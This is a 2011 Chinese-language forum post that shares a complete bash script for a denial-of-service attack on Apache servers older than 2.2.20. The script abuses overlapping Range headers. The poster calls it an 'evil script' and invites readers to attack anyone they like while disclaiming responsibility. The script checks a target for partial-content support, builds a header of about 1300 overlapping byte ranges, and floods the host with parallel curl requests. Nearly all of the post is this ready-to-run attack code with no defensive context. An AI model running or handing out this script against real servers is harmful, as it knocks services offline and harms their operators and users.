- 论坛徽章:
- 0
|
邪恶脚本一个,咋玩谁你便,与我无关。- #!/bin/bash
- # this attack range byte for apache (<2.2.20)
- if (( $# != 2 ));then
- echo "$0 www.example.com 50"
- exit
- fi
- function Exit() {
- kill $(jobs -p) 2<&-
- rm -f /tmp/${PID}
- wait
- exit
- }
- Msg=$(curl --connect-timeout 15 -m 60 --retry 2 -I -H "Accept-Encoding:gzip" -H "Range:bytes=0-" -H "Connection:close" http://${1} 2<&-)
- if [[ ${Msg} =~ "206 Partial" ]];then
- if (( $2 > 512 )) || (( $2 == 0 ));then N=50;else N=$2;fi
- R="0-"
- PID=$
- for ((i=0;i<1300;i++));do R="${R},5-${i}";done
- trap 'Exit' 1 2 3 15 22 24
- mknod /tmp/${PID} p ;exec 4<>/tmp/${PID}
- for((i=0;i<N;i++));do echo 1 >&4;done
- while read;do
- ( curl -H "Accept-Encoding:gzip" -H "Range:bytes=${R}" -H "Connection:close" \
- --connect-timeout 15 -m 60 --retry 2 "http://${1}" >/dev/null 2<&1 ;echo 1 >&4; ) &
- if (( x++ == $2+0 ));then echo ":pPpPpppPpPPppPpppPp" 2</dev/null;x=0;fi
- done <&4
- else
- echo "Host does not seem vulnerable."
- fi
|
|
免费注册
发表于 2011-10-14 16:41